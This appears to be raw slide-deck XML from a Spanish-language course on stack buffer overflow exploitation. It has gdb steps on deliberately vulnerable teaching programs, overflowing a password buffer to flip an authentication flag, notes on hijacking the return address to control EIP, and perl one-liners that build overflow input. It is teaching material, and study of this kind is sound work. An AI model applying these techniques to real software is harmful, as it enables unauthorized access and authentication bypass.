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matic SC"/>
      <p:regular r:id="rId31"/>
      <p:bold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dc6737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dc673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1dc6737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dc6737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1e7238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1e7238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1e7238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1e7238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1e7238c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1e7238c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26fb1db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6fb1db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1dc6737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dc6737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1f44cfc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1f44cfc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1f71fc8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1f71fc8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f71fc8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f71fc8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f4ae8cd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f4ae8cd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f71fc8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f71fc8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26fb1db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26fb1db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1f71fc84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1f71fc84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26fb1db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26fb1db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26fb1db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26fb1db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1f44cfc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1f44cfc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f4ae8cd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f4ae8cd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f4ae8cd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f4ae8cd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f4ae8cd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f4ae8cd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f4ae8cd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f4ae8cd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f4ae8cd8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4ae8cd8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f4ae8cd8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f4ae8cd8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1c783b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1c783b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gerasdf/InsecureProgramming/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/fundacion-sadosky/guia-escritura-exploits/blob/master/LICENSE" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?reload=9&amp;v=gIC6ffD0OGg" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=06KRtovN4Z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0x300</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Exploitation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Aplicaciones de Call Convention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15" name="Google Shape;115;p22"/>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Ej_overflow_2.c</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) list 1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) break 9 (confirmar)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) break 16 (confirmar)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) x/s password_buffer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) x/x &amp;auth_flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) print 0xbffef3c - 0xbfffef2c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb)$1 = 16 (confirmar)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) x/16xw password_buffer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>Encontrar la dirección y valor de auth_flag</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21" name="Google Shape;121;p23"/>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Ej_overflow_2.c</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) continue</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) x/s password_buffer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) x/16xw password_buffer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) x/4cb &amp;auth_flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) x/dw &amp;auth_flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) continue</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Explicar lo sucedido. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>¿ Qué valor retornó </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>check_authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="e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27" name="Google Shape;127;p24"/>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33338" y="1143000"/>
            <a:ext cx="7553325" cy="2400300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="Google Shape;129;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4176713" y="71438"/>
            <a:ext cx="4905375" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="Google Shape;130;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4571997" y="1604972"/>
            <a:ext cx="4529150" cy="35491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36" name="Google Shape;136;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900" y="923875"/>
            <a:ext cx="9144000" cy="42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Ej_overflow_2.c</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Break en check_authentication, strcpy y return auth_flag.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Después volcar el contenido de la pila para encontrar el parámetro de la función, las variables locales y la dirección de retorno de la función.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42" name="Google Shape;142;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900" y="923875"/>
            <a:ext cx="9144000" cy="42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Ej_overflow_2.c</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) run AAAAAAAAAAAAAAAAAAAA (20 A)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) info register eip, esp ebp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) x/32xw $esp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Explicar qué estoy viendo..!!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) continue</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) x/32xw $esp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Comparar los valores de las direcciones con el caso anterior.!!</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48" name="Google Shape;148;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900" y="923875"/>
            <a:ext cx="9144000" cy="42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Ej_overflow_2.c</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) x/s password_buffer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) x/x &amp;auth_flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>¿ Podría reconocer la dirección de retorno a main ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>(gdb) disassemble main</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Algunas CONCLUSIONES...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54" name="Google Shape;154;p28"/>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Ej_overflow_3.c</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>A partir de Ej_overflow_2 construir un programa donde se cambie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>el orden de las definiciones de las variables de la función check_authentication.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Repetir los pasos para Ej_overflow2.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>CONCLUSIONES.!!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60" name="Google Shape;160;p29"/>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t>Conclusiones</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Cuando se sobrescriben algunos de los bytes de la dirección de retorno, el programa aún intentará usar ese valor para restaurar el registro del puntero de ejecución (EIP). </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Esto generalmente resulta en un bloqueo, ya que la ejecución pretende saltar a una ubicación aleatoria. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>PEEERO...este valor no necesita ser aleatorio. Si se controla la sobreescritura, la ejecución puede controlarse para saltar a una ubicación específica. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>¿A dónde deberíamos decirle que vaya?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66" name="Google Shape;166;p30"/>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t>Sobreescribir una dirección de retorno</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Una primera aproximación es reutilizar el código del propio programa y “decirle” a la función check_authentication que “retorne” a una línea en particular. ¿ Será posible ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Interesante..!!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>¿ Cómo hacemos esto ?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>La capacidad de probar rápidamente diferentes cosas es vital.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>Bash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es"/>
              <a:t>Perl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>son las dos cosas que se necesita para experimentar with exploiting.!!</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72" name="Google Shape;172;p31"/>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t>Experimentando con bash</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>$ perl -e 'print "A" x 20;'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>$ perl -e 'print "\x41" x 20;'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>$ perl -e 'print "A"x20 . "BCD" . "\x61\x66\x67\x69"x2 . "Z";'</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>$ $(perl -e 'print "ls -l";')</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Todos programamos..!!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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>n programa se compone de un conjunto COMPLEJO de reglas que siguen un cierto flujo de ejecución que finalmente le dice a un hardware qué hacer. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Suele ocurrir que ese hardware luego le dice qué hacer a un componente físico (cyber physical systems).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>“Exploiting a program” es simplemente una forma inteligente de hacer que la computadora haga lo que Ud. quiere que haga, incluso si el programa actualmente en ejecución fue diseñado para evitar esa acción. Mmmm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="e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78" name="Google Shape;178;p32"/>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Experimentando con bash y Ej_overflow_1</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2400" u="sng"/>
              <a:t>Objetivo</a:t>
            </a:r>
            <a:endParaRPr sz="2400" u="sng"/>
          </a:p>
          <a:p>
